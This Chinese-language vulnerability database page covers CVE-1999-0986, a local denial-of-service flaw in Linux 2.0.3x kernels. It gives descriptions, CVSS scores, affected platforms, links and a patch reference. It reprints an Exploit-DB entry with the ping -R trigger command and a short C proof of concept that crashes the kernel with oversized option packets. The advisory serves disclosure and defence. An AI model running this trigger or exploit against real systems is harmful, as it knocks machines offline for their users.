CVE-1999-0986
CVSS5.0
发布时间 :1999-12-08 00:00:00
修订时间 :2008-09-09 08:36:35
NMCOE    

[原文]The ping command in Linux 2.0.3x allows local users to cause a denial of service by sending large packets with the -R (record route) option.


[CNNVD]Linux带选项数据包长度漏洞(CNNVD-199912-038)

        Linux 2.0.3x版本的ping命令存在漏洞。本地用户通过发送带有-R(可记录路由)选项的大型数据包,引发拒绝服务。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:linux:linux_kernel:2.0.35Linux Kernel 2.0.35
cpe:/o:linux:linux_kernel:2.0.36Linux Kernel 2.0.36
cpe:/o:linux:linux_kernel:2.0.37Linux Kernel 2.0.37
cpe:/o:linux:linux_kernel:2.0
cpe:/o:linux:linux_kernel:2.0.38Linux Kernel 2.0.38
cpe:/o:redhat:linux:5.2::i386
cpe:/o:linux:linux_kernel:2.0.34Linux Kernel 2.0.34
cpe:/o:debian:debian_linux:2.1Debian Debian Linux 2.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0986
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0986
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199912-038
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/870
(UNKNOWN)  BID  870

- 漏洞信息

Linux带选项数据包长度漏洞
中危 未知
1999-12-08 00:00:00 2005-05-02 00:00:00
本地  
        Linux 2.0.3x版本的ping命令存在漏洞。本地用户通过发送带有-R(可记录路由)选项的大型数据包,引发拒绝服务。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.
        Apply the patch available at:
        ftp://ftp.us.kernel.org/pub/linux/kernel/people/andrea/patches/v2.0/2.0.38/ip-opt-1.gz

- 漏洞信息 (19675)

Debian 2.1,Linux kernel 2.0.x,RedHat 5.2 Packet Length with Options Vulnerability (EDBID:19675)
linux local
1999-12-08 Verified
0 Andrea Arcangeli
N/A [点击下载]
Debian 2.1,Linux kernel 2.0.34/2.0.35/2.0.36/2.0.37/2.0.38,RedHat 5.2 i386 Packet Length with Options Vulnerability

source: http://www.securityfocus.com/bid/870/info

A vulnerability in the Linux kernel's TCP/IP allows local users to crash, hang or corrupt the system.

A local user can crash, hang or currupt the system by sending out a packet with options longer than the maximum IP packet length. An easy way to generate such packet is by using the command "ping -s 65468 -R ANYADDRESS". The -R option is for the IP record route option. Under kernel versions 2.2.X the command will fail with an message of "message too long".

The vulnerability seems to be the result of the kernel not checking aif packet with options is longer than the maximum packet size. A long packet seems to lead to memory corruption. 

/* Exploit option length missing checks in Linux-2.0.38
   Andrea Arcangeli <andrea@suse.de> */

#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <netinet/ip.h>

main()
{
	int sk;
	struct sockaddr_in sin;
	struct hostent * hostent;
#define PAYLOAD_SIZE (0xffff-sizeof(struct udphdr)-sizeof(struct iphdr))
#define OPT_SIZE 1
	char payload[PAYLOAD_SIZE];

	sk = socket(AF_INET, SOCK_DGRAM, 0);
	if (sk < 0)
		perror("socket"), exit(1);

	if (setsockopt(sk, SOL_IP, IP_OPTIONS, payload, OPT_SIZE) < 0)
		perror("setsockopt"), exit(1);

	bzero((char *)&sin, sizeof(sin));

	sin.sin_port = htons(0);
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = htonl(2130706433);

	if (connect(sk, (struct sockaddr *) &sin, sizeof(sin)) < 0)
		perror("connect"), exit(1);

	if (write(sk, payload, PAYLOAD_SIZE) < 0)
		perror("write"), exit(1);
}

		

- 漏洞信息

1163
Linux Kernel Malformed Packet Options Handling Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

- 时间线

1999-12-09 Unknow
1999-12-09 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站